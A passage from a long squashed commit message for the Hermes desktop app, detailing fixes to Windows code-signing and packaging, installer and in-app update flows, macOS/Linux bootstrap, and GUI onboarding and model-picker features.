whatever) tagged with stage=desktop, making the actual cause
diagnosable instead of an opaque exit code.
* fix(install.ps1): restore Initialize-ElectronBuilderCache (CSC env vars alone aren't enough)
VM run 4 diagnosis: even with CSC_IDENTITY_AUTO_DISCOVERY=false set,
electron-builder still fetches winCodeSign and signs bundled binaries.
The log shows the signing happens BEFORE the cache extraction:
• signing with signtool.exe ...\winpty-agent.exe
• signing with signtool.exe ...\OpenConsole.exe
• downloading winCodeSign-2.6.0.7z
• <symlink privilege error>
Cause: node-pty's bundled prebuilds are listed in apps/desktop's
asarUnpack ['**/*.node', '**/prebuilds/**']. electron-builder
re-signs anything unpacked from asar, regardless of whether OUR
binary gets signed. The signtool invocation needs winCodeSign on
disk, which needs the .7z extracted, which hits the macOS-symlink
crash on non-admin Windows.
The CSC env vars I added in d5fe46727 only kill IDENTITY DISCOVERY
(so OUR Hermes.exe stays unsigned, which is fine — we have no cert).
They don't prevent the toolchain fetch for the bundled-prebuild
re-sign. I removed the pre-extract in d5fe46727 thinking the env
vars subsumed it; that was wrong. Both are needed.
Restoring Initialize-ElectronBuilderCache verbatim from c7e46f9f3
and keeping the CSC env vars. Wrote a clearer doc-comment at the
call site explaining the two-knob interaction so future maintainers
don't drop one half again.
* fix(desktop): disable signtool via signtoolOptions.sign=null, drop dead winCodeSign pre-extract
VM run 5 diagnosis: the pre-extract from 3b29e65c1 ran (extracted 83
files, 24MB) but produced ZERO files at the expected sentinel path
'/winCodeSign-2.6.0/windows-10/x64/signtool.exe'.
Cause: the .7z archive's root entries are 'windows-10/', 'darwin/',
'linux/', etc. — not 'winCodeSign-2.6.0/<arch>'. Extracting with
'-o$cacheRoot' put files at $cacheRoot/windows-10/..., NOT at
$cacheRoot/winCodeSign-2.6.0/windows-10/.... I had the directory
nesting wrong from the start.
And then we observed: electron-builder downloads winCodeSign-2.6.0.7z
under a random numeric filename ('384387955.7z') regardless of what's
already extracted in the parent dir. The cache key isn't the dirname;
it's content-addressed. So the pre-extract approach was doomed even
if the path nesting had been right.
Actual fix: signtoolOptions.sign=null in apps/desktop/package.json's
win build config. electron-builder honors this and skips the bundled-
prebuild signing entirely — no signtool invocation, no winCodeSign
fetch, no symlink-privilege crash. The previous failures all stemmed
from electron-builder pre-signing node-pty's bundled .exes
(winpty-agent.exe, OpenConsole.exe) which are already author-signed
upstream; re-signing with our nonexistent cert was overwriting good
sigs with nothing useful anyway.
Cost: when we DO get a real cert later, we'll add it back with the
sign function pointing at the cert chain. Until then, all-null is
the correct config and unblocks every non-admin Windows user.
Removed Initialize-ElectronBuilderCache (the dead pre-extract).
Removed the call site. Kept the CSC_IDENTITY_AUTO_DISCOVERY env
vars as belt-and-suspenders against a future electron-builder
change that might revive cert auto-discovery.
* fix(desktop): use no-op sign function instead of sign=null
VM run 6 still hit the symlink crash even with signtoolOptions.sign=null.
electron-builder 26.8.1 treats null as 'use the default signtool path'
rather than 'skip signing', so the winCodeSign fetch + extraction still
fired for the bundled prebuild re-sign.
The Electron docs (electronjs.org/docs/latest/tutorial/code-signing)
make it clear signing is OPTIONAL and unsigned apps work fine — users
just see SmartScreen on first launch. The electron-builder mechanism
for 'don't actually sign anything' is to supply a custom sign function
(via signtoolOptions.sign: '<path-to-cjs-module>') that resolves
without invoking signtool.
build-noop-sign.cjs is that module — a 5-line async function that
returns undefined. electron-builder calls it for every binary it would
have signed, gets back a resolved promise, and considers each binary
'signed.' No signtool spawn, no winCodeSign fetch, no symlink crash.
When Nous's cert arrives, replace this file with a real signing hook
(@electron/windows-sign-based or a direct signtool invocation). The
architecture's signing-ready and the cutover is a one-file edit.
* fix(desktop): signAndEditExecutable=false to skip signtool path entirely
After reading app-builder-lib/winPackager.js line 216 + 231 directly:
signAndEditExecutable is the ACTUAL hardcoded gate that short-circuits
both signApp() (which signs Hermes.exe + every shouldSignFile match
including bundled prebuilds) AND createTransformerForExtraFiles().
None of signtoolOptions.sign / sign:null / sign:<custom-fn> gate the
winCodeSign download — that happens before they're consulted.
What we lose: rcedit also runs through signAndEditResources, so
disabling this drops PE metadata (file properties showing 'Hermes' /
'Nous Research' / file description). Cost is real but bounded:
* Hermes.exe filename, icon, asar contents, app identity intact
* Task Manager shows 'Hermes.exe' (the filename) not 'Hermes' (PE
description) — minor downgrade
* Start menu, taskbar, window title all work normally
* SmartScreen will warn once (unsigned, same as before)
When the cert lands, flip signAndEditExecutable back to default true,
both signing AND rcedit return, PE metadata is restored.
Removes the no-op sign function (build-noop-sign.cjs) since
signAndEditExecutable=false prevents signtool from being invoked at
all — the custom hook never gets called either.
* feat(install.ps1): write .hermes-bootstrap-complete marker at end of install
The desktop app's main.cjs resolver ladder has a 'bootstrap-needed' rung
that fires when .hermes-bootstrap-complete is missing from
ACTIVE_HERMES_ROOT. Pre-Hermes-Setup, this marker was written by the
packaged-desktop's own bootstrap-runner.cjs at the end of its install
flow. Now that Hermes-Setup.exe runs install.ps1 directly, install.ps1
needs to own the marker — otherwise the desktop sees no marker on first
launch and triggers its legacy first-launch bootstrap (re-running
install.ps1 from inside Electron, the exact recursion Hermes-Setup.exe
was supposed to obviate).
Implementation:
* New Stage-BootstrapMarker (worker) → Write-BootstrapMarker (helper)
* Slotted in the manifest right after platform-sdks, before the
interactive configure/gateway stages, so it runs unconditionally
when the install reaches the finalize phase
* Schema mirrors apps/desktop/electron/main.cjs writeBootstrapMarker /
isBootstrapComplete EXACTLY: {schemaVersion: 1, pinnedCommit,
pinnedBranch, completedAt}. Schema version stays at 1 so old
desktops that read marker files written by future install.ps1s
can still parse them.
* pinnedCommit comes from -Commit flag (Hermes-Setup.exe passes it)
or falls back to 'git rev-parse HEAD' in InstallDir
* pinnedBranch from -Branch flag, defaults to 'main' matching
install.ps1's own param default
Two PS-5.1 gotchas baked into comments:
* The ?. null-conditional operator doesn't exist pre-PS7; use
explicit if-checks on Get-Command results
* Set-Content -Encoding UTF8 emits a BOM in 5.1 and Node's plain
JSON.parse rejects BOM — write via .NET's UTF8Encoding(false)
to produce BOM-less JSON the desktop's readJson() can parse
* feat(installer): drive in-app updates through the Tauri installer
Converge update on the same principle as bootstrap: one driver owns all
repo mutation. The desktop becomes a pure consumer that hands off to
Hermes-Setup.exe --update instead of re-implementing git/pip in Electron.
- hermes desktop --build-only: build without launching, so the installer
owns the post-update launch (CLI keeps build logic single-sourced).
- Installer AppMode {Install,Update} from argv; get_mode exposed to the UI.
- Installer self-copies to HERMES_HOME/hermes-setup.exe on install success
(no-op guard during --update re-invocation to avoid the locked-exe copy).
- Installer --update flow (update.rs): wait for the desktop to release the
venv shim, run 'hermes update --yes --gateway' (branch on exit 0/2/other),
then 'hermes desktop --build-only', then launch the rebuilt desktop. Reuses
the bootstrap event channel + progress UI via a synthetic two-stage manifest.
- Desktop applyUpdates() gutted (~105 lines of git/stash/pull/pyproject/pip
removed) -> thin handoff: spawn updater, app.quit() to free the shim.
Detection (checkUpdates, commit changelog, behind-count) kept intact.
- install.ps1 creates Start Menu + Desktop shortcuts to the packed Hermes.exe
(never bare 'hermes desktop', which would rebuild every launch).
* test update
* fix(installer): pass --branch to hermes update in the --update flow
The install is a detached-HEAD checkout of a pinned commit. Without
--branch, 'hermes update' fell back to its default (main) and switched
the checkout to main — a divergent branch that lacks the desktop CLI
command — so the update targeted the wrong branch and the rebuild stage
failed with 'invalid choice: desktop'.
Thread BUILD_PIN_BRANCH (the branch this installer was built against,
and the same branch the desktop detected the update on) into
'hermes update --branch <b>' so update + rebuild stay on-branch.
* test update
* fix(installer): stamp Hermes icon onto Hermes.exe via rcedit (no winCodeSign)
The unpacked Hermes.exe showed the stock Electron icon + name in the
taskbar because build.win.signAndEditExecutable=false disables BOTH
electron-builder's signing AND its rcedit metadata/icon stamping. That
flag is load-bearing: enabling it re-triggers signtool -> winCodeSign,
whose macOS symlinks crash 7-Zip on non-admin Windows (unfixable dead end).
Decouple identity-stamping from signing entirely: after npm run pack,
run rcedit ourselves on the produced exe.
- Add rcedit as a direct devDependency of apps/desktop (the transitive
electron-winstaller copy is fragile).
- apps/desktop/scripts/set-exe-identity.cjs: Node helper that calls
rcedit's named export to set icon + ProductName/FileDescription/
CompanyName. Node builds argv natively — avoids the PowerShell->exe
->JSON double-escaping that broke the app-builder rcedit path.
- install.ps1 Set-DesktopExeIdentity invokes the script after the build,
before shortcuts. Best-effort: failure keeps the stock icon, never
fails the install. rcedit is a pure PE editor — no signtool, no
winCodeSign, no symlinks.
Verified locally: stamping a copy of the built Hermes.exe embeds the
32x32 icon and sets ProductName=Hermes.
Also fix update-path success-screen flash: in update mode the installer
hands off + exits in ~600ms, so don't route to the 'launch Hermes'
success view (it flashed before the window closed).
* update test
* fix(desktop): show 'hermes update' guidance for CLI installs instead of dead-end error
A user who installed via the CLI (irm|iex / install.sh) then ran
`hermes desktop` has no staged hermes-setup.exe, so clicking Update
in-app hit resolveUpdaterBinary()=null and showed a misleading error
('re-run the Hermes installer') with a Try-again button that could
never succeed — a dead loop for a perfectly valid install.
Treat the no-updater case as an intentional outcome, not a failure:
- main.cjs applyUpdates returns { ok:true, manual:true, command:'hermes update' }
(no throw, no 'error' stage) when no updater binary exists.
- New 'manual' update stage + apply-state.command thread the command to the UI.
- updates-overlay ManualView: a polished terminal-native card with the
exact command and a copy button, framed as the correct path for a CLI
user rather than an error.
GUI-installer users are unaffected — hermes-setup.exe present => seamless
auto-update runs as before. Zero new process orchestration; can't fail
the update demo.
* update test
* fix(gui): pin /api/hermes/update to the current branch
The desktop command-center 'update' action hits POST /api/hermes/update,
which spawned bare `hermes update` with no --branch. cmd_update then
falls back to its default (main) and checks the working tree OUT of the
tracked branch — a bb/gui install silently jumped to main and lost the
desktop CLI.
Resolve the checkout's current branch and pass --branch <current> from
this endpoint only. The engine default (main) is DELIBERATELY unchanged:
bare `hermes update` from a terminal, the gateway /update bot command,
and the CLI/TUI relaunch path all keep their long-standing 'update against
main' contract for the existing user base. Only the GUI button is scoped
to update-the-branch-you're-on. Detached HEAD / git failure falls back to
the bare default.
* update test
* fix(desktop): branch-pin the CLI manual-update command card
The 'Update from your terminal' card (shown to CLI installs with no staged
updater) hardcoded bare `hermes update` — which defaults to main and would
switch a bb/gui (or any non-main) checkout off-branch. Same bug we fixed for
the GUI button, leaked into the card's copy text.
Resolve the checkout's current branch and show `hermes update --branch
<current>` for non-main checkouts; keep it bare for main so the card stays
clean. Best-effort: bare fallback if branch detection fails. Matches the
GUI button + installer --update contract; bare terminal/bot/TUI update
paths still default to main, unchanged.
* docs: phragg was here
* feat(desktop): lead onboarding with Nous Portal + fix fresh-install detection (#34970)
- Feature Nous Portal as the primary onboarding card (Recommended tag,
app logo, single pitch line); collapse other OAuth providers behind an
"Other providers" disclosure whose open/closed state persists.
- Surface OpenRouter as a one-click API-key option inside the disclosure;
move "I have an API key" to a quiet bottom-right link.
- Treat "no provider configured" as a normal onboarding state, not a red
error banner (provider-setup-errors copy match).
- Fix setup.runtime_check: it reported ready when the resolved runtime had
an empty credential or only implicit Bedrock/IAM, so fresh installs never
saw onboarding. Now requires a usable credential.
- Auto-wire Windows fonts for WSL2 users so the renderer renders real
Segoe UI instead of the DejaVu fallback; make WSL detection env-independent
via the /proc kernel marker.
* feat(desktop): live elapsed timer on install bootstrap steps
The first-launch install overlay showed a static "Installing" with no
motion, so long steps (notably the repo clone) looked frozen. Stamp each
stage's start time on the running transition and tick once a second so the
active step shows live elapsed (e.g. "Installing · 1:23"), plus elapsed on
the overall current-step line. Completed steps keep their final duration.
* fix(desktop): resolve PortableGit for update checks + reserve titlebar tools space
- runGit() hardcoded spawn('git'), which ENOENTs on fresh installer-driven
Windows installs (git is PortableGit under %LOCALAPPDATA%\hermes\git, never
on PATH) — so "Check for updates" failed with "Couldn't check for updates".
Add resolveGitBinary() mirroring findGitBash (PortableGit → Git-for-Windows
→ PATH) and use it in runGit.
- PageSearchShell rendered a full-width search input in the titlebar row, so
on Windows its right edge slid under the fixed top-right tools + native
window controls. Reserve that footprint via --titlebar-tools-* vars.
* fix(desktop): stop streaming caret from shifting layout on completion
The streaming caret (::after on the running message's last child) was an
in-flow inline-block adding ~0.78em of inline width, which could wrap the
last line mid-stream; when the caret is removed on completion the line
un-wraps and reflows — the visible post-response layout shift. Net-zero its
inline advance with a compensating negative margin so it paints at the text
end without consuming layout width.
* fix(desktop): stop completed-message layout shift while streaming
The assistant message action bar used `hideWhenRunning`, which unmounts it
whenever the thread is streaming. Since the bar reserves vertical space in
each completed assistant message's footer (it's invisible-until-hover via
opacity, not via mount), unmounting it collapsed every prior turn by the
bar's height — then remounting on resolve grew them back, shifting the whole
conversation (visible as "padding appears above the last user message").
Drop hideWhenRunning so the footer height is constant; the bar stays
invisible during streaming via its existing opacity/pointer-events gating.
* fix(merge): keep windows-footgun suppressions inline
* fix(merge): keep remaining gateway footgun suppressions inline
* fix(merge): restore contracts caught by main-target CI
* fix(dashboard): honor injected HERMES_DASHBOARD_SESSION_TOKEN
The desktop shell mints a session token and signs its /api + /api/ws
calls with it via HERMES_DASHBOARD_SESSION_TOKEN, but the main-merge
restored a web_server.py that ignored the env var and minted its own
random _SESSION_TOKEN -- so every desktop request 401'd and the UI
reported "gateway offline". Read the injected token (fall back to a
fresh random one) so loopback HTTP + WS auth line up.
Adds a regression test so a future merge can't silently drop the read.
* fix(desktop): align fresh-install home so upgraders don't brick
Two related first-launch bugs on machines with a legacy ~/.hermes:
- install.ps1 hardcoded $HermesHome/$InstallDir to %LOCALAPPDATA%\hermes
and ignored the HERMES_HOME the desktop passes through. The desktop
freezes HERMES_HOME at module load and prefers a legacy ~/.hermes when
%LOCALAPPDATA%\hermes is absent, so the installer wrote to a different
home than the shell read -> "Could not connect to Hermes gateway". Honor
$env:HERMES_HOME in the param defaults.
- isBootstrapComplete() trusted the marker + checkout without verifying a
runnable venv, so an interrupted/split install spawned a dead backend
instead of re-bootstrapping. Also require the venv python to exist.
* fix(dashboard): allow packaged desktop file:// origin on loopback WS
The packaged Electron desktop loads its renderer over file://, so its
/api/ws handshake carries Origin: file:// (or null). The DNS-rebinding
WebSocket Origin guard only accepted http(s) origins matching the bound
host, so it rejected the desktop's own renderer with 4403 -> "Could not
connect to Hermes gateway" on macOS.
A browser DNS-rebinding attacker can only ever present an http(s) origin
(the site hosting the malicious page); it cannot forge file://, null, or
a custom app scheme AND hold the loopback session token. So on loopback
binds we now trust non-web origins -- the token in _ws_auth_ok remains
the real authenticator. Public/gated binds still reject them, and
cross-site http(s) origins are still rejected everywhere.
* fix(desktop): resolve renderer assets relative to BASE_URL
Absolute public asset paths (/apple-touch-icon.png, /ds-assets/...) work
under the dev server but break in the packaged app, where the renderer is
loaded from file://.../index.html and a leading slash resolves to the
filesystem root -> broken onboarding provider icon and backdrop image on
macOS. Prefix these with import.meta.env.BASE_URL so they resolve next to
the bundled index.html in both dev and packaged builds.
* feat(desktop): automate first-launch bootstrap on macOS/Linux
Previously a packaged macOS/Linux app with no Hermes install hit a
dead-end ("first-launch install is not yet automated -- run install.sh
manually") because install.sh lacked the staged protocol install.ps1
exposes. Now both platforms bootstrap on first launch with the same
structured, per-step progress UI as Windows.
- install.sh: add --manifest / --stage / --json / --non-interactive plus
a stage dispatcher (prerequisites, repository, venv, python-deps,
node-deps, path, config, setup, gateway, complete). User-input stages
(setup, gateway) are skipped under --non-interactive; the in-app
onboarding overlay owns API keys/model, matching the Windows flow.
Each stage runs inside the install dir (its own process) and a new
--commit flag pins the checkout to the build-stamp SHA.
- bootstrap-runner.cjs: drive the staged manifest/stage/JSON protocol for
both install.ps1 (PowerShell) and install.sh (bash), selected by
installer kind; removed the single-blob POSIX shim.
- main.cjs: drop the macOS/Linux unsupported-platform dead-end so the
bootstrap-needed path runs the installer on every platform.
* fix(dashboard): return 404 JSON for unmatched /api paths instead of SPA HTML
The SPA catch-all (serve_spa) served index.html for any unmatched GET,
including unregistered /api/* endpoints. A missing API route therefore
came back as <!doctype html> with status 200, and JSON clients (the
desktop app's fetchJson) crashed with an opaque
'SyntaxError: Unexpected token <' instead of a clear error.
- web_server.py: unmatched /api or /api/... now returns 404 JSON
('No such API endpoint'); non-api paths still serve the SPA for
client-side routing.
- main.cjs fetchJson: detect an HTML body / text/html content-type on a
2xx response and reject with a clear message naming the URL, rather
than a raw JSON.parse SyntaxError. Empty bodies resolve to null;
malformed JSON reports the URL plus a snippet.
* say 'OS appearance' instead of 'macOS appearance'
* feat(install): add --include-desktop stage + PowerShell-style flags to install.sh
Brings install.sh to parity with install.ps1's bootstrap surface so the
shared Rust/Tauri bootstrapper (apps/bootstrap-installer) can drive a
macOS/Linux install the same way it drives Windows.
- Accept the PowerShell-style aliases the bootstrapper emits to both
installers: -Commit / -Branch (alongside existing -Manifest / -Stage /
-Json / -NonInteractive).
- Add --include-desktop / -IncludeDesktop. When set, the manifest gains a
'desktop' stage (immediately before 'complete'), and a new install_desktop
runs a root workspace `npm install` + `npm run pack` (electron-builder
--dir, signing auto-discovery disabled) to produce release/mac*/Hermes.app
-- mirroring install.ps1's Install-Desktop / Stage-Desktop.
- The flag is opt-in, exactly like Windows: the signed bootstrap installer
passes it; the Electron app's own first-launch bootstrap and the CLI
one-liner omit it (building the desktop from inside the running app would
clobber it).
* fix: tts endpoints
* macOS desktop: install + in-app self-update (#35607)
* fix(installer): align macOS HERMES_HOME with the rest of the stack
paths.rs computed the macOS Hermes home as ~/Library/Application Support/
hermes, but nothing else does: hermes_constants.get_hermes_home() (Python),
scripts/install.sh, and the Electron desktop's resolveHermesHome() all use
~/.hermes on macOS. The drift meant the Tauri installer wrote the install to
one directory and the desktop looked for it in another, so a fresh GUI
install never found its backend (the file's own comment warned this exact
drift would break things). Use ~/.hermes on macOS to match.
* fix(install.sh): always emit a stage result frame on failure
Stage helpers (clone_repo, install_deps, check_python, …) were written for
the monolithic flow and call `exit 1` on failure. Under `--stage`, that
terminated the process before the JSON result frame was printed, so the
installer's parse_stage_result saw "no frame" instead of a clean
{ok:false,...} contract response. Run the stage body in a subshell so an
`exit` only unwinds the subshell and the parent still emits the frame.
* feat(install.sh): auto-provision git on macOS/Linux (parity with install.ps1)
install.ps1 downloads PortableGit on Windows, but install.sh just printed a
"please install git" hint and exited — so a fresh Mac with no developer tools
(no Xcode CLT → no git) couldn't get past the clone step. check_git now tries
to install git before bailing:
- macOS: Homebrew if present (headless), else `xcode-select --install`
(the CLT prompt also provides the compiler some wheels need), polling for
git to appear.
- Linux: apt/dnf/pacman via sudo when available.
Falls back to the manual instructions only if auto-provision fails.
* feat(desktop): in-app GUI+backend self-update on macOS/Linux
On Windows the staged Hermes-Setup binary drives updates (quit → hermes
update → hermes desktop --build-only → relaunch). The mac drag-install has no
such binary, so "Update now" previously just printed `hermes update`.
Since there's no venv-shim file lock on POSIX, the desktop can drive the whole
update itself. applyUpdates now, when no staged updater exists on mac/linux:
1. runs `hermes update --yes [--branch <current>]` (backend git pull + deps),
2. runs `hermes desktop --build-only` (OS-aware GUI rebuild) with the
Hermes-managed Node + venv on PATH,
3. spawns a detached swapper that waits for this process to exit, dittos the
freshly built Hermes.app over the running bundle, clears quarantine, and
relaunches.
Degrades to "backend updated — restart to load the new GUI" if the rebuild
fails or there's no .app bundle to swap (dev run, Linux AppImage).
* chore: uptick
* chore: uptick
* chore: linux build
* fix(install): detect xcode-select git stub on fresh macOS
* chore: bump
* fix(desktop): repair voice dictation on Windows
Voice dictation was broken on Windows in two ways:
1. Mic access was denied. The Electron permission request handler only
granted 'media' requests whose details.mediaTypes included 'audio',
but Chromium on Windows frequently fires the mic request with an empty
mediaTypes array, so getUserMedia threw NotAllowedError. The handler
now grants audio-capture when mediaTypes includes 'audio' OR is
empty/absent, handles the 'audioCapture' permission name, and adds a
setPermissionCheckHandler (the synchronous path Chromium also consults
for getUserMedia on Windows). Video is still denied.
2. Transcripts went nowhere. The composer's insertText handler (used by
dictation and other inserts) only updated the assistant-ui composer
store via setText, never the contentEditable editor DOM. The
draft->editor sync effect only re-renders the editor when it is NOT
focused, and dictation runs while the editor has/regains focus, so the
transcript was stored but never shown and could not be sent. insertText
now renders into the editor DOM and places the caret, mirroring
appendExternalText.
Also hardens fetchJson: a 2xx response with an HTML body (or text/html
content-type) now rejects with a clear message naming the URL instead of
an opaque JSON.parse 'Unexpected token <' error.
* feat(desktop): route Nous subscribers onto the Tool Gateway from the GUI
When the GUI sets the main provider to Nous via POST /api/model/set, call
the same apply_nous_managed_defaults the CLI uses after model selection, so
GUI/onboarding users land on the Nous Tool Gateway the same way CLI users do
— no separate prompt, no duplicated logic.
Purely additive: apply_nous_managed_defaults skips any tool where the user
has a direct key (FIRECRAWL_API_KEY, FAL_KEY, etc.) or explicit config, so it
never overwrites a user's own setup. Only unconfigured tools get routed.
- web_server.py: in set_model_assignment (scope=main, provider=nous), resolve
enabled toolsets and apply managed defaults; guarded so a Portal hiccup never
blocks saving the model. Returns routed tools as gateway_tools.
- onboarding.ts: surface a 'Tool Gateway enabled' toast listing routed tools.
- types/hermes.ts: add gateway_tools to ModelAssignmentResponse.
- tests: cover nous-applies, non-nous-skips, and failure-doesnt-block-save.
* feat(desktop): mirror hermes model free/paid curation in GUI onboarding
GUI onboarding picked models[0] from /api/model/options, which ignores the
Nous free/paid tier — a free user could land on a paid default (e.g.
anthropic/claude-opus-4). Now the recommended default mirrors what `hermes
model` does.
- web_server.py: new GET /api/model/recommended-default?provider=<slug>. For
Nous it runs the same curation as the CLI (get_curated_nous_model_ids +
pricing + check_nous_free_tier + union_with_portal_{free,paid}_recommendations
+ partition_nous_models_by_tier) so free users get a free model and paid users
get the curated default. Other providers fall back to the first curated model.
Never 500s — returns empty model on error so onboarding degrades gracefully.
- hermes.ts: getRecommendedDefaultModel client + RecommendedDefaultModel type.
- onboarding.ts: fetchProviderDefaultModel prefers the recommended endpoint,
falls back to models[0] when unavailable.
- tests: free-tier picks free model, paid-tier picks curated default, failure
returns empty without 500.
* feat(desktop): show model pricing + free/paid tier gating in GUI picker
The CLI `hermes model` picker shows per-model $/Mtok pricing and gates paid
models on free Nous accounts. The GUI picker showed bare model names. Bring it
to parity across both the model-picker dialog and onboarding confirm card.
Backend:
- inventory.build_models_payload gains a pricing=True flag → _apply_pricing
enriches each provider row with formatted per-model pricing
({input,output,cache,free}) via the same _format_price_per_mtok the CLI uses,
and for Nous adds free_tier + unavailable_models (paid models a free user
can't select) via check_nous_free_tier + partition_nous_models_by_tier.
Best-effort: any pricing/tier failure is swallowed and fails open (no gating).
- /api/model/options and TUI model.options now pass pricing=True so the
global picker and in-session picker both carry pricing.
Frontend:
- ModelOptionProvider gains pricing/free_tier/unavailable_models; new
ModelPricing type.
- model-picker dialog renders In/Out $/Mtok (or a Free pill) per model, a
Free tier/Pro badge on the Nous heading, and disables + grays unavailable
paid models for free users with a 'Pro models need a paid subscription' note.
- onboarding confirm card shows the chosen model's price + tier badge.
Tests: test_inventory_pricing covers price formatting, free-tier gating,
paid no-gating, providers without pricing, and swallowed failures.
* fix(desktop): GUI model picker shows curated Nous list in curated order
Two bugs made the GUI Nous model list diverge from the `hermes model` CLI picker:
1. Backend (model_switch.py): the Nous row in list_authenticated_providers
fell through to cached_provider_model_ids("nous"), dumping the full live
/v1/models catalog (~50 vendor-prefixed models, alphabetical). Now it uses
the curated list AND applies the Portal free/paid recommendation union —
exactly like _model_flow_nous in main.py — so newly-launched models such as
stepfun/step-3.7-flash:free surface in curated order. Best-effort: falls
back to the curated list alone if the Portal fetch fails.
2. Frontend (model-picker.tsx): cmdk's Command had shouldFilter on (default),
which re-sorts items by fuzzy-match score (≈alphabetical) and ignores array
order. Set shouldFilter={false} + own the search term and do an
order-preserving substring filter, so the backend's curated order is shown
verbatim.
* feat(desktop): add/switch providers from the model picker via onboarding reuse
The model picker could only select models from already-authenticated
providers. Switching to a new provider had no in-app path. Rather than
duplicate provider UI, reuse the existing onboarding provider selector
(featured Nous + other providers + API-key form + device-code/PKCE flow +
model-confirm with pricing/tier).
- onboarding store: add a 'manual' flag with startManualOnboarding() /
closeManualOnboarding(). Manual mode forces the onboarding overlay to show
even when configured===true and refreshOnboarding no longer auto-dismisses
on runtime-ready (the app is already working — the user is just adding or
switching a provider).
- onboarding overlay: render when manual even if configured; show a Close
button (the first-run flow has none since the app can't run yet).
- model picker: 'Add provider' footer button opens the onboarding selector;
ModelResults lists only configured (model-bearing) providers.
* feat(desktop): add PUT /api/tools/toolsets/{name} enable/disable endpoint
* feat(desktop): add toggleToolset RPC binding
* feat(desktop): toolset enable/disable switch in Tools settings
* feat(desktop): tool configuration parity in GUI Tools settings
Bring the desktop GUI Tools settings to parity with the CLI `hermes tools`
for provider selection and API-key configuration.
Backend (hermes_cli/web_server.py):
- GET /api/tools/toolsets/{name}/config - provider matrix + key status
- PUT /api/tools/toolsets/{name}/provider - persist provider selection
Shared core (hermes_cli/tools_config.py):
- Extract apply_provider_selection / _write_provider_config from the
interactive _configure_provider so the CLI and GUI write identical
config keys (web.backend, tts.provider, browser.cloud_provider, plugin
image/video providers, use_gateway flags) through one code path.
Desktop UI:
- ToolsetConfigPanel: provider list with select, per-provider API-key
entry (set/replace/clear/reveal via the shared env RPCs), Ready/Needs
keys state, guidance for Nous-auth and post-setup providers.
- Wire the Configured/Needs keys pill to expand the panel inline; refresh
the toolset list after key changes so the pill updates live.
- Add getToolsetConfig / selectToolsetProvider RPC bindings + types.
Post-setup (OAuth/install) flows still defer to the CLI; see
docs spike findings for the planned /api/tools/setup/* endpoint family.
Tests: backend round-trip + 400 cases for the new endpoints and
apply_provider_selection; desktop vitest coverage for the config panel
(provider render, select, key save). No change-detector tests.
Also removes three stale completed plan docs.
* fix(desktop): show real Hermes version + sync package.json on release
The desktop app version was disconnected from the Hermes version: the
release script bumped pyproject.toml + hermes_cli/__init__.py but never
touched apps/desktop/package.json, which sat stale at 0.0.2 (lockfile at
0.0.1).
- main.cjs: hermes:version IPC now resolves __version__ from
hermes_cli/__init__.py (the canonical source release.py bumps) via a new
resolveHermesVersion() helper, falling back to app.getVersion() when the
source tree isn't readable. The About panel now always shows the live
Hermes version and can't drift.
- release.py: update_version_files() also bumps apps/desktop/package.json
in lockstep with pyproject (top-level version only; dep specs untouched).
- One-time catch-up: package.json 0.0.2 -> 0.15.1 and the lockfile root
mirrors 0.0.1 -> 0.15.1.
* fix(desktop): stamp exe identity in afterPack hook so updates stay branded
The packed Hermes.exe reverted to the stock Electron icon + "Electron" name
after an in-app update. The icon/identity stamp (rcedit) lived only in
install.ps1, but the installer's --update path rebuilds the desktop via
`hermes desktop --build-only` -> `npm run pack`, which never ran install.ps1
and so never stamped the rebuilt exe.
Move the stamp into an electron-builder afterPack hook so it runs for EVERY
packed build regardless of caller (first install, hermes desktop, the update
rebuild, or a manual npm run pack):
- set-exe-identity.cjs: refactor to export stampExeIdentity(exe, desktopRoot);
still runnable as a standalone CLI.
- after-pack.cjs (new): afterPack hook calling stampExeIdentity. Windows-only
guard; best-effort (logs + resolves on failure, never fails the build).
- package.json: register build.afterPack.
- install.ps1: remove the now-redundant Set-DesktopExeIdentity function + call;
the hook handles it during npm run pack.
electron-builder's own rcedit step stays disabled (signAndEditExecutable=false)
to avoid the signtool -> winCodeSign -> 7-Zip macOS-symlink crash on non-admin
Windows; the hook runs rcedit directly (pure PE resource edit, no signing).
* fix(desktop): export afterPack hook as exports.default so electron-builder runs it
The afterPack hook used `module.exports = fn`, which electron-builder's hook
loader doesn't pick up — it expects the function as the module's default
export (the same shape afterSign/notarize.cjs uses). The hook silently never
ran, so even first install shipped the stock "Electron" exe.
Switch to `exports.default = async function afterPack(...)`. Verified with a
real `npm run pack`: electron-builder now invokes the hook and the produced
release/win-unpacked/Hermes.exe carries ProductName/FileDescription=Hermes.
* chore(desktop): drop auto-build release CI in favor of manual build + upload
Remove desktop-release.yml (nightly-on-main + stable publish). Installers
are now built locally per platform and uploaded to a GitHub Release by hand;
the website points at them via NEXT_PUBLIC_HERMES_DL_* env. Update README +
docs and drop the dead desktop-nightly channel links.
* fix(desktop): stable shortcut icon + bust icon cache so updates repaint
Symptom on a freshly-installed laptop: Hermes.exe itself shows the correct
Hermes icon (Explorer reads the live exe's stamped PE resource), but the
desktop shortcut still draws the stock Electron icon.
Cause: New-DesktopShortcuts set IconLocation to "<exe>,0", so Windows cached
the icon it extracted from the exe at shortcut-creation time. On an update the
exe gets re-stamped, but the shortcut keeps rendering the stale cached bitmap.
- package.json: ship assets/icon.ico beside the exe via extraResources
(-> resources/icon.ico). Verified with a real npm run pack.
- install.ps1 New-DesktopShortcuts: point IconLocation at resources/icon.ico
(fallback to <exe>,0 if absent) — a dedicated .ico is cache-stable and skips
the per-exe extraction that goes stale. Then run `ie4uinit.exe -show` to bust
the shell icon cache so the shortcut repaints immediately instead of showing
the old Electron icon until reboot.
Both best-effort; never fail an otherwise-good install.
* dummy update
* feat(desktop): self-heal update branch + backend contract guard
Two fixes for the bb/gui→main transition:
- Self-update self-heals: if the tracked branch (e.g. bb/gui) no longer
exists on origin (merged + deleted), the desktop updater falls back to
main and persists it. Read-only ls-remote probe that only flips on a
definitive "ref absent" (exit 2), never on a transient network error, so
already-installed clients migrate themselves with no manual flip.
- Backend contract guard: tui_gateway reports DESKTOP_BACKEND_CONTRACT in
session runtime info; the desktop warns with a one-click "Update Hermes"
when the backend predates the GUI's required contract (e.g. a bb/gui app
pointed at a main checkout) instead of failing cryptically downstream.
* docs(desktop): rewrite README to match current install/update/build flow
The old README contradicted itself (claimed a bundled Python payload while
also saying it no longer bundles source) and predated cross-platform support.
Rewrite for accuracy: Linux is a first-class build target, install.sh/install.ps1
both drive the staged bootstrap, the real self-update handoff (Windows
Hermes-Setup vs in-app macOS/Linux), and the bb/gui→main self-heal + backend
